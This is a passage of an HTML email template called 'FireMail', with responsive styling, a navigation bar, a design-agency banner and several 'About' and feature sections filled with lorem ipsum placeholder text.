<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
	<meta name="viewport" content="width=device-width"/>
	<title>FireMail | Email Template</title>
	<style type="text/css">
			/*////// RESET STYLES //////*/
		body{height:100% !important; margin:0; padding:0; width:100% !important;}
		table{border-collapse:separate;}
		img, a img{border:0; outline:none; text-decoration:none;}
		h1, h2, h3, h4, h5, h6{margin:0; padding:0;}
		p{margin: 1em 0;}

		/*////// CLIENT-SPECIFIC STYLES //////*/
		.ReadMsgBody{width:100%;} .ExternalClass{width:100%;}
		.ExternalClass, .ExternalClass p, .ExternalClass span, .ExternalClass font, .ExternalClass td, .ExternalClass div{line-height:100%;}
		table, td{mso-table-lspace:0pt; mso-table-rspace:0pt;}
		#outlook a{padding:0;}
		img{-ms-interpolation-mode: bicubic;}
		body, table, td, p, a, li, blockquote{-ms-text-size-adjust:100%; -webkit-text-size-adjust:100%;}
			
		/*////// GENERAL STYLES //////*/
		img{ max-width: 100%; height: auto; }

		/*////// TABLET STYLES //////*/
		@media only screen and (max-width: 620px) {
		.shrink_font{
			font-size: 62px;
		}
		/*////// GENERAL STYLES //////*/
			#foxeslab-email .table1 { width: 90% !important;}
			#foxeslab-email .table1-2 { width: 98% !important; margin-left: 1%; margin-right: 1%;}
			#foxeslab-email .table1-3 { width: 98% !important; margin-left: 1%; margin-right: 1%;}
			#foxeslab-email .table1-4 { width: 98% !important; margin-left: 1%; margin-right: 1%;}
			#foxeslab-email .table1-5 { width: 90% !important; margin-left: 5%; margin-right: 5%;}

			#foxeslab-email .tablet_no_float { clear: both; width: 100% !important; margin: 0 auto !important; text-align: center !important; }
			#foxeslab-email .tablet_wise_float { clear: both; float: none !important; width: auto !important; margin: 0 auto !important; text-align: center !important; }

			#foxeslab-email .tablet_hide { display: none !important; }

			#foxeslab-email .image1 { width: 98% !important; }
			#foxeslab-email .image1-290 { width: 100% !important; max-width: 290px !important; }

			.center_content{ text-align: center !important; }
			.center_image{ margin: 0 auto !important; }
			.center_button{ width: 50% !important;margin-left: 25% !important;max-width: 250px !important; }
			.centerize{margin: 0 auto !important;}
		}

	
		/*////// MOBILE STYLES //////*/
		@media only screen and (max-width: 480px){
			.shrink_font{
				font-size: 48px;
			}
			.safe_color{
				color: #6a1b9a !important;
			}
			/*////// CLIENT-SPECIFIC STYLES //////*/
			body{width:100% !important; min-width:100% !important;} /* Force iOS Mail to render the email at full width. */
			table[class="flexibleContainer"]{ width: 100% !important; }/* to prevent Yahoo Mail from rendering media query styles on desktop */

			/*////// GENERAL STYLES //////*/
			img[class="flexibleImage"]{height:auto !important; width:100% !important;}

			#foxeslab-email .table1 { width: 98% !important; }
			#foxeslab-email .no_float { clear: both; width: 100% !important; margin: 0 auto !important; text-align: center !important; }
			#foxeslab-email .wise_float {	clear: both;	float: none !important;	width: auto !important;	margin: 0 auto !important;	text-align: center !important;	}

			#foxeslab-email .mobile_hide { display: none !important; }
			.auto_height{height: auto !important;}
		}
	</style>
</head>




<!-- section-1 "navbar" -->
<table class="table_full editable-bg-color bg_color_512da8 editable-bg-image" bgcolor="#f0f0f0" width="100%" align="center" mc:repeatable="castellab" mc:variant="Header" cellspacing="0" cellpadding="0" border="0" style="background-size: cover; border-collapse: collapse; background-color: rgb(240, 240, 240); background-position: center center; background-repeat: no-repeat no-repeat;" background="">
	<tbody><tr>
		<td>
			<table class="table1" width="600" align="center" border="0" cellspacing="0" cellpadding="0">
				<tbody><tr><td height="30"></td></tr>
				<tr>
					<td>
						<!-- Logo -->
						<table class="no_float" align="left" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr>
								<td class="editable-img" align="center">
									<a href="http://www.neobazar.net">
										<img editable="true" mc:edit="image101" src="http://i.imgur.com/UJOh5P0.png?1" style="display:block; line-height:0; font-size:0; border:0;" border="0" alt="image">
									</a>
								</td>
							</tr>
							<tr><td height="30"></td></tr>
						</tbody></table><!-- END logo -->

						<!-- Nav menu -->
						<table class="no_float" width="" align="right" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr>
								<!-- Home -->
								<td mc:edit="text101" class="text_color_ffffff" style="color: #ffffff; font-size: 14px; font-weight: 500; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
									<div class="editable-text">
										<span class="text_container">
											<a href="#" class="text_color_ffffff" style="text-decoration: none; color: #ffffff;">Home</a>
										</span>
									</div>
								</td>
								<td width="50"></td>
								<!-- Work -->
								<td mc:edit="text102" class="text_color_ffffff" style="color: #ffffff; font-size: 14px; font-weight: 500; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
									<div class="editable-text">
										<span class="text_container">
											<a href="#" class="text_color_ffffff" style="text-decoration: none; color: #ffffff;">Work</a>
										</span>
									</div>
								</td>
								<td width="50"></td>
								<!-- Contact -->
								<td mc:edit="text103" class="text_color_ffffff" style="color: #ffffff; font-size: 14px; font-weight: 500; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
									<div class="editable-text">
										<span class="text_container">
											<a href="#" class="text_color_ffffff" style="text-decoration: none; color: #ffffff;">Contact</a>
										</span>
									</div>
								</td>
							</tr>
							<tr><td height="30"></td></tr>
						</tbody></table><!-- END nav menu -->
					</td>
				</tr>
				<!-- horizontal gap -->
				<tr><td height="100"></td></tr>

				<!-- text -->
				<tr>
					<td>
						<table class="table1" width="460" align="center" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr>
								<td>
									<table height="100" align="center" border="0" cellspacing="0" cellpadding="0" style="max-width: 200px;">
										<tbody><tr>
											
											<td width="20"></td>
											
											<td width="20"></td>
											
										</tr>
									</tbody></table>
								</td>
							</tr>
							<!-- horizontal gap -->
							<tr><td height="20"></td></tr>
							<tr>
								<td mc:edit="text105" align="center" class="text_color_ffffff" style="color: #ffffff;letter-spacing: 3px; font-size: 36px;line-height: 1.8;font-weight: 700; font-family: 'Open Sans', verdana, Helvetica, sans-serif; mso-line-height-rule: exactly;">
									<div class="editable-text">
										<span class="text_container">WE ARE A CREATIVE <span style="color:#ce93d8;">DESIGN</span> AGENCY</span>
									</div>
								</td>
							</tr>
							<!-- horizontal gap -->
							<tr><td height="20"></td></tr>
							<tr>
								<td mc:edit="text105" align="center" class="text_color_ffffff" style="color: #ffffff;line-height: 2;letter-spacing: 2px; font-size: 12px;font-weight: 500; font-family: 'Open Sans', verdana, Helvetica, sans-serif; mso-line-height-rule: exactly;">
									<div class="editable-text" style="line-height: 2;">
										<span class="text_container">HIGH RATED ELITE AUTHOR TEAM</span>
									</div>
								</td>
							</tr>
							<!-- horizontal gap -->
							<tr><td height="30"></td></tr>
							<tr>
								<td>
									<table class="button_bg_color_ffffff bg_color_ffffff" bgcolor="#ffffff" width="135" height="30" align="center" border="0" cellpadding="0" cellspacing="0" style="border-radius:25px; border-collapse: separate">
										<tbody><tr>
											<td mc:edit="text106" class="text_color_512da8" align="center" valign="middle" style="color: #512da8; font-size: 11px; font-weight: 600; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
												<div class="editable-text">
													<span class="text_container">
														<a href="#" class="text_color_512da8" style="text-decoration: none; color: #512da8;">FIND OUT MORE</a>
													</span>
												</div>
											</td>
										</tr>
									</tbody></table>
								</td>
							</tr>
						</tbody></table>
					</td>
				</tr><!-- END text -->
				<!-- padding-bottom -->
				<tr><td height="150"></td></tr>
			</tbody></table><!-- END container -->
		</td>
	</tr>
</tbody></table><!-- END wrapper -->





<!-- section-2-1 -->
<table class="table_full editable-bg-color bg_color_ffffff editable-bg-image" bgcolor="#ffffff" width="100%" align="center" mc:repeatable="castellab" mc:variant="Header" cellspacing="0" cellpadding="0" border="0" style="background-image: url(#); background-position: top center; background-repeat: no-repeat; border-collapse: collapse; mso-table-lspace: 0pt; mso-table-rspace: 0pt;" background="#">
	<tbody><tr>
		<td>
			<table class="table1" width="600" align="center" border="0" cellspacing="0" cellpadding="0" style="margin: 0 auto;">
				<!-- padding-top -->
				<tbody><tr><td height="60"></td></tr>
				<tr>
					<td>
						<!-- column-1  -->
						<table class="table1-2" width="190" align="left" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr>
								<td style="padding-left: 20px;border-left: 1px solid #ebebeb;">
									<table align="center" border="0" cellspacing="0" cellpadding="0" style="max-width: 200px;">										
										<tbody><tr>
											<td mc:edit="text201" align="left" class="center_content text_color_242a33" style="color: #242a33; font-size: 24px;line-height: 1.4; font-weight: 700; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
												<div class="editable-text" style="line-height: 1.4;">
													<span class="text_container">ABOUT <br>OUR AGENCY</span>
												</div>
											</td>
										</tr>
									</tbody></table>
								</td>
							</tr>
							<!-- margin-bottom -->
							<tr><td height="10"></td></tr>
						</tbody></table><!-- END column-1 -->

						<!-- vertical gap -->
						<table class="tablet_hide" width="20" align="left" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr><td height="1"></td></tr>
						</tbody></table>

						<!-- column-2  -->
						<table class="table1-2" width="390" align="right" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr>
								<td>
									<table align="center" border="0" cellspacing="0" cellpadding="0" style="max-width: 390;">										
										<tbody><tr>
											<td mc:edit="text202" align="left" class="center_content text_color_242a33" style="color: #242a33; font-size: 12px;line-height: 1.8; font-weight: 500; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
												<div class="editable-text" style="line-height: 1.8;">
													<span class="text_container">Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Lorem ipsum dolor sit amet.</span>
												</div>
											</td>
										</tr>
									</tbody></table>
								</td>
							</tr>
							<!-- margin-bottom -->
							<tr><td height="10"></td></tr>
						</tbody></table><!-- END column-2 -->
					</td>
				</tr>
				<!-- horizontal gap -->
				<tr><td height="15"></td></tr>
				<tr>
					<td>
						<!-- column-1  -->
						<table class="table1-2" width="390" align="left" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr>
								<td>
									<table align="center" border="0" cellspacing="0" cellpadding="0" style="max-width: 390;">
										<tbody><tr>
											<td mc:edit="text203" align="left" class="center_content text_color_242a33" style="color: #242a33; font-size: 12px;line-height: 1.8; font-weight: 500; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
												<div class="editable-text" style="line-height: 1.8;">
													<span class="text_container">Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Lorem ipsum dolor sit amet.</span>
												</div>
											</td>
										</tr>
									</tbody></table>
								</td>
							</tr>
							<!-- margin-bottom -->
							<tr><td height="10"></td></tr>
						</tbody></table><!-- END column-1 -->

						<!-- vertical gap -->
						<table class="tablet_hide" width="20" align="left" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr><td height="1"></td></tr>
						</tbody></table>

						<!-- column-2  -->
						<table class="table1-2" width="190" align="right" border="0" cellspacing="0" cellpadding="0">
							<!-- padding-top -->
							<tbody><tr><td height="15"></td></tr>

							<tr>
								<td valign="middle">
									<table class="button_bg_color_512da8 bg_color_512da8 center_button" bgcolor="#512da8" width="135" height="30" align="center" border="0" cellpadding="0" cellspacing="0" style="border-radius:25px;border-collapse:separate;">
										<tbody><tr>
											<td mc:edit="text204" class="text_color_ffffff" align="center" valign="middle" style="color: #ffffff; font-size: 11px; font-weight: 600; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
												<div class="editable-text">
													<span class="text_container"><a href="#" class="text_color_ffffff" style="text-decoration: none; color: #ffffff;">MORE ABOUT US</a></span>
												</div>
											</td>
										</tr>
									</tbody></table>
								</td>
							</tr>
							<!-- margin-bottom -->
							<tr><td height="15"></td></tr>
						</tbody></table><!-- END column-2 -->
					</td>
				</tr>
				<!-- padding-bottom -->
				<tr><td height="45"></td></tr>
			</tbody></table><!-- END container -->
		</td>
	</tr>

	<!-- separator -->
	<tr>
		<td>
			<table width="600" align="center" class="table1" border="0" cellpadding="0" cellspacing="0">
				<tbody><tr><td height="1" bgcolor="#ebebeb"></td></tr>
			</tbody></table>
		</td>
	</tr><!-- END separator -->
</tbody></table><!-- END wrapper -->










<!-- section-6-1 -->
<table class="table_full editable-bg-color bg_color_ffffff editable-bg-image" bgcolor="#ffffff" width="100%" align="center" mc:repeatable="castellab" mc:variant="Header" cellspacing="0" cellpadding="0" border="0" style="background-image: url(#); background-position: top center; background-repeat: no-repeat; border-collapse: collapse; mso-table-lspace: 0pt; mso-table-rspace: 0pt;" background="#">
	<tbody><tr>
		<td>
			<table class="table1" width="600" align="center" border="0" cellspacing="0" cellpadding="0" style="margin: 0 auto;">
				<!-- padding-top -->
				<tbody><tr><td height="60"></td></tr>
				<tr>
					<td>
						<!-- column-1  -->
						<table class="table1-2" width="190" align="left" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr>
								<td style="padding-left: 20px;border-left: 1px solid #ebebeb;">
									<table align="center" border="0" cellspacing="0" cellpadding="0" style="max-width: 200px;">										
										<tbody><tr>
											<td mc:edit="text601" align="left" class="center_content text_color_242a33" style="color: #242a33; font-size: 24px;line-height: 1.4; font-weight: 700; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
												<div class="editable-text" style="line-height: 1.4;">
													<span class="text_container">ABOUT OUR TEAM</span>
												</div>
											</td>
										</tr>
									</tbody></table>
								</td>
							</tr>
							<!-- margin-bottom -->
							<tr><td height="10"></td></tr>
						</tbody></table><!-- END column-1 -->

						<!-- vertical gap -->
						<table class="tablet_hide" width="20" align="left" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr><td height="1"></td></tr>
						</tbody></table>

						<!-- column-2  -->
						<table class="table1-2" width="390" align="right" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr>
								<td>
									<table align="center" border="0" cellspacing="0" cellpadding="0" style="max-width: 390;">										
										<tbody><tr>
											<td mc:edit="text602" align="left" class="center_content text_color_242a33" style="color: #242a33; font-size: 12px;line-height: 1.8; font-weight: 500; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
												<div class="editable-text" style="line-height: 1.8;">
													<span class="text_container">Curabitur ac lacus arcu. Sed vehicula varius lectus ante commodo Curabitur ac lacus arcu. Sed vehicula varius lectus ante commodo. feugiat. Nulla ut</span>
												</div>
											</td>
										</tr>
									</tbody></table>
								</td>
							</tr>
							<!-- margin-bottom -->
							<tr><td height="10"></td></tr>
						</tbody></table><!-- END column-2 -->
					</td>
				</tr>
				<!-- horizontal gap -->
				<tr><td height="15"></td></tr>

				<tr>
					<td>
						<!-- column-1  -->
						<table class="table1-2" width="390" align="left" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr>
								<td>
									<table align="center" border="0" cellspacing="0" cellpadding="0" style="max-width: 390;">
										<tbody><tr>
											<td mc:edit="text603" align="left" class="center_content text_color_242a33" style="color: #242a33; font-size: 12px;line-height: 1.8; font-weight: 500; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
												<div class="editable-text" style="line-height: 1.8;">
													<span class="text_container">Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Lorem ipsum dolor sit amet.</span>
												</div>
											</td>
										</tr>
									</tbody></table>
								</td>
							</tr>
							<!-- margin-bottom -->
							<tr><td height="10"></td></tr>
						</tbody></table><!-- END column-1 -->

						<!-- vertical gap -->
						<table class="tablet_hide" width="20" align="left" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr><td height="1"></td></tr>
						</tbody></table>

						<!-- column-2  -->
						<table class="table1-2" width="190" align="right" border="0" cellspacing="0" cellpadding="0">
							<!-- padding-top -->
							<tbody><tr><td height="15"></td></tr>

							<tr>
								<td valign="middle">
									<table class="button_bg_color_512da8 bg_color_512da8 center_button" bgcolor="#512da8" width="135" height="30" align="center" border="0" cellpadding="0" cellspacing="0" style="border-radius:25px;border-collapse:separate;">
										<tbody><tr>
											<td mc:edit="text604" class="text_color_ffffff" align="center" valign="middle" style="color: #ffffff; font-size: 11px; font-weight: 600; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
												<div class="editable-text">
													<span class="text_container"><a href="#" class="text_color_ffffff" style="text-decoration: none; color: #ffffff;">MORE ABOUT US</a></span>
												</div>
											</td>
										</tr>
									</tbody></table>
								</td>
							</tr>
							<!-- margin-bottom -->
							<tr><td height="15"></td></tr>
						</tbody></table><!-- END column-2 -->
					</td>
				</tr>
				<!-- horizontal gap-->
				<tr><td height="45"></td></tr>
			</tbody></table><!-- END container -->
		</td>
	</tr>

	<!-- separator -->
	<tr>
		<td>
			<table width="600" align="center" class="table1" border="0" cellpadding="0" cellspacing="0">
				<tbody><tr><td height="1" bgcolor="#ebebeb"></td></tr>
			</tbody></table>
		</td>
	</tr><!-- END separator -->
</tbody></table><!-- END wrapper -->







<!-- section-8-1 -->
<table class="table_full editable-bg-color bg_color_ffffff editable-bg-image" bgcolor="#ffffff" width="100%" align="center" mc:repeatable="castellab" mc:variant="Header" cellspacing="0" cellpadding="0" border="0" style="background-image: url(#); background-position: top center; background-repeat: no-repeat; border-collapse: collapse; mso-table-lspace: 0pt; mso-table-rspace: 0pt;" background="#">
	<!-- padding-top -->
	<tbody><tr><td height="60"></td></tr>
	<tr>
		<td>
			<table class="table1" width="600" align="center" border="0" cellspacing="0" cellpadding="0" style="margin: 0 auto;">
				<tbody><tr>
					<td>
						<!-- column-1  -->
						<table class="table1-2" width="190" align="left" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr>
								<td style="padding-left: 20px;border-left: 1px solid #ebebeb;">
									<table align="center" border="0" cellspacing="0" cellpadding="0" style="max-width: 200px;">										
										<tbody><tr>
											<td mc:edit="text801" align="left" class="center_content text_color_242a33" style="color: #242a33; font-size: 24px;line-height: 1.4; font-weight: 700; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
												<div class="editable-text" style="line-height: 1.4;">
													<span class="text_container">ABOUT OUR SKILLS</span>
												</div>
											</td>
										</tr>
									</tbody></table>
								</td>
							</tr>
							<!-- margin-bottom -->
							<tr><td height="10"></td></tr>
						</tbody></table><!-- END column-1 -->

						<!-- vertical gap -->
						<table class="tablet_hide" width="20" align="left" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr><td height="1"></td></tr>
						</tbody></table>

						<!-- column-2  -->
						<table class="table1-2" width="390" align="right" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr>
								<td>
									<table align="center" border="0" cellspacing="0" cellpadding="0" style="max-width: 390;">										
										<tbody><tr>
											<td mc:edit="text802" align="left" class="center_content text_color_242a33" style="color: #242a33; font-size: 12px;line-height: 1.8; font-weight: 500; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
												<div class="editable-text" style="line-height: 1.8;">
													<span class="text_container">Curabitur ac lacus arcu. Sed vehicula varius lectus ante commodo Curabitur ac lacus arcu. Sed vehicula varius lectus ante commodo. feugiat. Nulla ut</span>
												</div>
											</td>
										</tr>
									</tbody></table>
								</td>
							</tr>
							<!-- margin-bottom -->
							<tr><td height="10"></td></tr>
						</tbody></table><!-- END column-2 -->
					</td>
				</tr>
				<!-- horizontal gap -->
				<tr><td height="15"></td></tr>

				<tr>
					<td>
						<!-- column-1  -->
						<table class="table1-2" width="390" align="left" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr>
								<td>
									<table align="center" border="0" cellspacing="0" cellpadding="0" style="max-width: 390;">
										<tbody><tr>
											<td mc:edit="text803" align="left" class="center_content text_color_242a33" style="color: #242a33; font-size: 12px;line-height: 1.8; font-weight: 500; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
												<div class="editable-text" style="line-height: 1.8;">
													<span class="text_container">Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Lorem ipsum dolor sit amet.</span>
												</div>
											</td>
										</tr>
									</tbody></table>
								</td>
							</tr>
							<!-- margin-bottom -->
							<tr><td height="10"></td></tr>
						</tbody></table><!-- END column-1 -->

						<!-- vertical gap -->
						<table class="tablet_hide" width="20" align="left" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr><td height="1"></td></tr>
						</tbody></table>

						<!-- column-2  -->
						<table class="table1-2" width="190" align="right" border="0" cellspacing="0" cellpadding="0">
							<!-- padding-top -->
							<tbody><tr><td height="15"></td></tr>

							<tr>
								<td valign="middle">
									<table class="button_bg_color_512da8 bg_color_512da8 center_button" bgcolor="#512da8" width="135" height="30" align="center" border="0" cellpadding="0" cellspacing="0" style="border-radius:25px;border-collapse:separate;">
										<tbody><tr>
											<td mc:edit="text804" class="text_color_ffffff" align="center" valign="middle" style="color: #ffffff; font-size: 11px; font-weight: 600; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
												<div class="editable-text">
													<span class="text_container"><a href="#" class="text_color_ffffff" style="text-decoration: none; color: #ffffff;">MORE ABOUT US</a></span>
												</div>
											</td>
										</tr>
									</tbody></table>
								</td>
							</tr>
							<!-- margin-bottom -->
							<tr><td height="15"></td></tr>
						</tbody></table><!-- END column-2 -->
					</td>
				</tr>
				<!-- padding-bottom -->
				<tr><td height="45"></td></tr>
			</tbody></table><!-- END container -->
		</td>
	</tr>

	<!-- separator -->
	<tr>
		<td>
			<table width="600" align="center" class="table1" border="0" cellpadding="0" cellspacing="0">
				<tbody><tr><td height="1" bgcolor="#ebebeb"></td></tr>
			</tbody></table>
		</td>
	</tr><!-- END separator -->
</tbody></table><!-- END wrapper -->











<!-- section-10-1 -->
<table class="table_full editable-bg-color bg_color_ffffff editable-bg-image" bgcolor="#ffffff" width="100%" align="center" mc:repeatable="castellab" mc:variant="Header" cellspacing="0" cellpadding="0" border="0" style="background-image: url(#); background-position: top center; background-repeat: no-repeat; border-collapse: collapse; mso-table-lspace: 0pt; mso-table-rspace: 0pt;" background="#">
	<!-- padding-top -->
	<tbody><tr><td height="60"></td></tr>
	<tr>
		<td>
			<table class="table1" width="600" align="center" border="0" cellspacing="0" cellpadding="0" style="margin: 0 auto;">
				<tbody><tr>
					<td>
						<!-- column-1  -->
						<table class="table1-2" width="190" align="left" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr>
								<td style="padding-left: 20px;border-left: 1px solid #ebebeb;">
									<table align="center" border="0" cellspacing="0" cellpadding="0" style="max-width: 200px;">										
										<tbody><tr>
											<td mc:edit="text1000" align="left" class="center_content text_color_242a33" style="color: #242a33; font-size: 24px;line-height: 1.4; font-weight: 700; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
												<div class="editable-text" style="line-height: 1.4;">
													<span class="text_container">KEY FEATURES</span>
												</div>
											</td>
										</tr>
									</tbody></table>
								</td>
							</tr>
							<!-- margin-bottom -->
							<tr><td height="10"></td></tr>
						</tbody></table><!-- END column-1 -->

						<!-- vertical gap -->
						<table class="tablet_hide" width="20" align="left" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr><td height="1"></td></tr>
						</tbody></table>

						<!-- column-2  -->
						<table class="table1-2" width="390" align="right" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr>
								<td>
									<table align="center" border="0" cellspacing="0" cellpadding="0" style="max-width: 390;">										
										<tbody><tr>
											<td mc:edit="text1001" align="left" class="center_content text_color_242a33" style="color: #242a33; font-size: 12px;line-height: 1.8; font-weight: 500; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
												<div class="editable-text" style="line-height: 1.8;">
													<span class="text_container">Curabitur ac lacus arcu. Sed vehicula varius lectus ante commodo Curabitur ac lacus arcu. Sed vehicula varius lectus ante commodo. feugiat. Nulla ut</span>
												</div>
											</td>
										</tr>
									</tbody></table>
								</td>
							</tr>
							<!-- margin-bottom -->
							<tr><td height="10"></td></tr>
						</tbody></table><!-- END column-2 -->
					</td>
				</tr>
				<!-- horizontal gap -->
				<tr><td height="15"></td></tr>

				<tr>
					<td>
						<!-- column-1  -->
						<table class="table1-2" width="390" align="left" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr>
								<td>
									<table align="center" border="0" cellspacing="0" cellpadding="0" style="max-width: 390;">
										<tbody><tr>
											<td mc:edit="text1002" align="left" class="center_content text_color_242a33" style="color: #242a33; font-size: 12px;line-height: 1.8; font-weight: 500; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
												<div class="editable-text" style="line-height: 1.8;">
													<span class="text_container">Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Lorem ipsum dolor sit amet.</span>
												</div>
											</td>
										</tr>
									</tbody></table>
								</td>
							</tr>
							<!-- margin-bottom -->
							<tr><td height="10"></td></tr>
						</tbody></table><!-- END column-1 -->

						<!-- vertical gap -->
						<table class="tablet_hide" width="20" align="left" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr><td height="1"></td></tr>
						</tbody></table>

						<!-- column-2  -->
						<table class="table1-2" width="190" align="right" border="0" cellspacing="0" cellpadding="0">
							<!-- padding-top -->
							<tbody><tr><td height="15"></td></tr>

							<tr>
								<td valign="middle">
									<table class="button_bg_color_512da8 bg_color_512da8 center_button" bgcolor="#512da8" width="135" height="30" align="center" border="0" cellpadding="0" cellspacing="0" style="border-radius:25px;border-collapse:separate;">
										<tbody><tr>
											<td mc:edit="text1003" class="text_color_ffffff" align="center" valign="middle" style="color: #ffffff; font-size: 11px; font-weight: 600; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
												<div class="editable-text">
													<span class="text_container"><a href="#" class="text_color_ffffff" style="text-decoration: none; color: #ffffff;">MORE ABOUT US</a></span>
												</div>
											</td>
										</tr>
									</tbody></table>
								</td>
							</tr>
							<!-- margin-bottom -->
							<tr><td height="15"></td></tr>
						</tbody></table><!-- END column-2 -->
					</td>
				</tr>
				<!-- horizontal gap-->
				<tr><td height="45"></td></tr>
			</tbody></table><!-- END container -->
		</td>
	</tr>

	<!-- separator -->
	<tr>
		<td>
			<table width="600" align="center" class="table1" border="0" cellpadding="0" cellspacing="0">
				<tbody><tr><td height="1" bgcolor="#ebebeb"></td></tr>
			</tbody></table>
		</td>
	</tr><!-- END separator -->
</tbody></table><!-- END wrapper -->





<!-- section-10-2 -->
<table class="table_full editable-bg-color bg_color_ffffff editable-bg-image" bgcolor="#ffffff" width="100%" align="center" mc:repeatable="castellab" mc:variant="Header" cellspacing="0" cellpadding="0" border="0" style="border-bottom: 1px solid #ebebeb;background-image: url(#); background-position: top center; background-repeat: no-repeat; border-collapse: collapse; mso-table-lspace: 0pt; mso-table-rspace: 0pt;" background="#">
	<!-- padding-top -->
	<tbody><tr><td height="60"></td></tr>
	<tr>
		<td>
			<table class="table1" width="600" align="center" border="0" cellspacing="0" cellpadding="0" style="margin: 0 auto;">
				<!-- row-1 -->
				<tbody><tr>
					<td>
						<!-- column-1  -->
						<table class="table1-3" width="166" align="left" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr>
								<td>
									<table align="center" border="0" cellspacing="0" cellpadding="0" style="max-width: 166px;">										
										<tbody><tr>
											<td align="center">
												<div style="border-style: none !important; display: block; border: 0 !important;" class="editable-img">
													<img editable="true" mc:edit="image1001" src="http://emails.castellab.com/firemail/images/01-circle-icon-chrome.png" style="display:block; line-height:0; font-size:0; border:0;" border="0" alt="">
												</div>
											</td>
										</tr>
										<!-- horizontal gap -->
										<tr><td height="20"></td></tr>

										<tr>
											<td mc:edit="text1004" align="center" class="text_color_282828" style="color: #282828; font-size: 13px; font-weight: 600; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
												<div class="editable-text">
													<span class="text_container">Dummy Content</span>
												</div>
											</td>
										</tr>
										<!-- horizontal gap -->
										<tr><td height="10"></td></tr>

										<tr>
											<td mc:edit="text1005" align="center" class="text_color_607580" style="color: #607580; font-size: 11px;line-height: 1.8;font-style: italic; font-weight: 400; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
												<div class="editable-text" style="line-height: 1.8;">
													<span class="text_container">Lorem ipsum dolor sit met, sed do eiusmod tempor incidiasd quis nostrud .</span>
												</div>
											</td>
										</tr>
									</tbody></table>
								</td>
							</tr>
							<!-- padding-bottom -->
							<tr><td height="40"></td></tr>
						</tbody></table><!-- END column-1-->

						<!-- vertical gap -->
						<table class="tablet_hide" width="50" align="left" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr><td height="1"></td></tr>
						</tbody></table>

						<!-- column-2  -->
						<table class="table1-3" width="166" align="left" border="0" cellspacing="0" cellpadding="0">
							<tbody><tr>
								<td>
									<table align="center" border="0" cellspacing="0" cellpadding="0" style="max-width: 166px;">							
										<tbody><tr>
											<td align="center">
												<div style="border-style: none !important; display: block; border: 0 !important;" class="editable-img">
													<img editable="true" mc:edit="image1002" src="http://emails.castellab.com/firemail/images/01-circle-icon-info.png" style="display:block; line-height:0; font-size:0; border:0;" border="0" alt="">
												</div>
											</td>
										</tr>
										<!-- horizontal gap -->
										<tr><td height="20"></td></tr>

										<tr>
											<td mc:edit="text1006" align="center" class="text_color_282828" style="color: #282828; font-size: 13px; font-weight: 600; font-family: 'Open Sans', Helvetica, sans-serif; mso-line-height-rule: exactly;">
												<div class="editable-text">
													<span class="text_container">Dummy Content</span>
												</div>
											</td>
										</tr>
										<!-- horizontal gap -->
										<tr><td height="10"></td></tr>

										<tr>
